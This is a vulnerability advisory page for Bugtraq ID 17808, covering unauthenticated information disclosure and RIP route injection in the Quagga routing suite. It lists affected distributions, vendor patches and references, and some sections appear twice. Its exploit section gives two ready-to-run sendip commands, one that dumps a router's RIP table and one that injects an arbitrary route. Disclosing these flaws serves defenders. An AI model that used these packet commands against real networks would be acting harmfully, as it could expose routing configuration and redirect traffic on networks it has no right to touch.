Quagga Information Disclosure and Route Injection Vulnerabilities
BID:17808
Info
Quagga Information Disclosure and Route Injection Vulnerabilities
| Bugtraq ID: | 17808 |
| Class: | Access Validation Error |
| CVE: |
CVE-2006-2223 CVE-2006-2224 |
| Remote: | Yes |
| Local: | No |
| Published: | May 03 2006 12:00AM |
| Updated: | Mar 19 2015 09:41AM |
| Credit: | Konstantin V. Gavrilenko discovered these vulnerabilities. |
| Vulnerable: |
Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 5.0 4 powerpc Ubuntu Ubuntu Linux 5.0 4 i386 Ubuntu Ubuntu Linux 5.0 4 amd64 Trustix Secure Linux 3.0 SuSE SUSE Linux Enterprise Server 9 SuSE SUSE Linux Enterprise Server 10 SuSE SUSE Linux Enterprise Desktop 10 SGI ProPack 3.0 SP6 S.u.S.E. UnitedLinux 1.0 S.u.S.E. SuSE Linux Standard Server 8.0 S.u.S.E. SuSE Linux School Server for i386 S.u.S.E. SUSE LINUX Retail Solution 8.0 S.u.S.E. SuSE Linux Openexchange Server 4.0 S.u.S.E. SuSE Linux Open-Xchange 4.1 S.u.S.E. Open-Enterprise-Server 9.0 S.u.S.E. Open-Enterprise-Server 1 S.u.S.E. Office Server S.u.S.E. Novell Linux Desktop 9.0 S.u.S.E. Novell Linux Desktop 1.0 S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux Professional 9.3 S.u.S.E. Linux Professional 9.2 x86_64 S.u.S.E. Linux Professional 9.2 S.u.S.E. Linux Professional 9.1 x86_64 S.u.S.E. Linux Professional 9.1 S.u.S.E. Linux Professional 10.1 S.u.S.E. Linux Personal 10.0 OSS S.u.S.E. Linux Personal 9.3 x86_64 S.u.S.E. Linux Personal 9.3 S.u.S.E. Linux Personal 9.2 x86_64 S.u.S.E. Linux Personal 9.2 S.u.S.E. Linux Personal 9.1 x86_64 S.u.S.E. Linux Personal 9.1 S.u.S.E. Linux Personal 10.1 S.u.S.E. Linux Enterprise Server for S/390 9.0 S.u.S.E. Linux Enterprise Server for S/390 RedHat Enterprise Linux WS 4 RedHat Enterprise Linux WS 3 RedHat Enterprise Linux ES 4 RedHat Enterprise Linux ES 3 RedHat Desktop 4.0 RedHat Desktop 3.0 RedHat Advanced Workstation for the Itanium Processor 2.1 IA64 RedHat Advanced Workstation for the Itanium Processor 2.1 Red Hat Enterprise Linux AS 4 Red Hat Enterprise Linux AS 3 Red Hat Enterprise Linux AS 2.1 IA64 Red Hat Enterprise Linux AS 2.1 Quagga Quagga Routing Software Suite 0.99.3 Quagga Quagga Routing Software Suite 0.98.5 Quagga Quagga Routing Software Suite 0.97.3 Gentoo Linux Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1 mips Debian Linux 3.1 m68k Debian Linux 3.1 ia-64 Debian Linux 3.1 ia-32 Debian Linux 3.1 hppa Debian Linux 3.1 arm Debian Linux 3.1 amd64 Debian Linux 3.1 alpha Debian Linux 3.1 |
| Not Vulnerable: | |
Discussion
Quagga Information Disclosure and Route Injection Vulnerabilities
Quagga is susceptible to remote information-disclosure and route-injection vulnerabilities. The application fails to properly ensure that required authentication and protocol configuration options are enforced.
These issues allow remote attackers to gain access to potentially sensitive network-routing configuration information and to inject arbitrary routes into the RIP routing table. This may aid malicious users in further attacks against targeted networks.
Quagga versions 0.98.5 and 0.99.3 are vulnerable to these issues; other versions may also be affected.
Quagga is susceptible to remote information-disclosure and route-injection vulnerabilities. The application fails to properly ensure that required authentication and protocol configuration options are enforced.
These issues allow remote attackers to gain access to potentially sensitive network-routing configuration information and to inject arbitrary routes into the RIP routing table. This may aid malicious users in further attacks against targeted networks.
Quagga versions 0.98.5 and 0.99.3 are vulnerable to these issues; other versions may also be affected.
Exploit / POC
Quagga Information Disclosure and Route Injection Vulnerabilities
Attackers can use existing network utilities to exploit these issues. The following commands are sufficient to demonstrate these vulnerabilities.
To exploit the information-disclosure issue:
sendip -p ipv4 -is 192.168.66.102 -p udp -us 520 -ud 520 -p rip -rv 1 -rc 1 -re 0:0:0:0:0:16 192.168.66.111
To exploit the route-injection issue:
sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 1 -rc 2 -re 2:0:192.168.36.0:255.255.255.0:0.0.0.0:1 192.168.69.100
Attackers can use existing network utilities to exploit these issues. The following commands are sufficient to demonstrate these vulnerabilities.
To exploit the information-disclosure issue:
sendip -p ipv4 -is 192.168.66.102 -p udp -us 520 -ud 520 -p rip -rv 1 -rc 1 -re 0:0:0:0:0:16 192.168.66.111
To exploit the route-injection issue:
sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 1 -rc 2 -re 2:0:192.168.36.0:255.255.255.0:0.0.0.0:1 192.168.69.100
Solution / Fix
Quagga Information Disclosure and Route Injection Vulnerabilities
Solution:
The vendor has released patches to address these issues.
Please see the references for more information and vendor advisories.
Quagga Quagga Routing Software Suite 0.97.3
Quagga Quagga Routing Software Suite 0.98.5
Quagga Quagga Routing Software Suite 0.99.3
Solution:
The vendor has released patches to address these issues.
Please see the references for more information and vendor advisories.
Quagga Quagga Routing Software Suite 0.97.3
-
Ubuntu quagga-doc_0.97.3-1ubuntu1.1_all.deb
Ubuntu 5.04 (Hoary Hedgehog)
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.97.3 -1ubuntu1.1_all.deb -
Ubuntu quagga_0.97.3-1ubuntu1.1_amd64.deb
Ubuntu 5.04 (Hoary Hedgehog)
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ub untu1.1_amd64.deb -
Ubuntu quagga_0.97.3-1ubuntu1.1_i386.deb
Ubuntu 5.04 (Hoary Hedgehog)
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ub untu1.1_i386.deb -
Ubuntu quagga_0.97.3-1ubuntu1.1_powerpc.deb
Ubuntu 5.04 (Hoary Hedgehog)
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.97.3-1ub untu1.1_powerpc.deb
Quagga Quagga Routing Software Suite 0.98.5
-
Quagga Fixes for 0.98.x RIPd bugs 261 and 262
http://bugzilla.quagga.net/attachment.cgi?id=84&action=view
Quagga Quagga Routing Software Suite 0.99.3
-
Quagga Fixes for 0.99.x RIPd bugs 261 and 262
http://bugzilla.quagga.net/attachment.cgi?id=83&action=view
References
Quagga Information Disclosure and Route Injection Vulnerabilities
References:
References:
- Bugzilla Bug 261: arh200604-1: RIPd unauthenticated route table broadcast (Quagga)
- Bugzilla Bug 262: arh200604-2: RIPv1 route injection bypasses authentication (Quagga)
- Quagga Software Suite Homepage (Quagga)
- RHSA-2006:0525-5 - quagga security update (RedHat)
- RHSA-2006:0533-4 - zebra security update (RedHat)
- Quagga RIPD unauthenticated route injection ("Konstantin V. Gavrilenko"
- Quagga RIPD unauthenticated route table broadcast ("Konstantin V. Gavrilenko"
- Re: Quagga RIPD unauthenticated route injection (Paul Jakma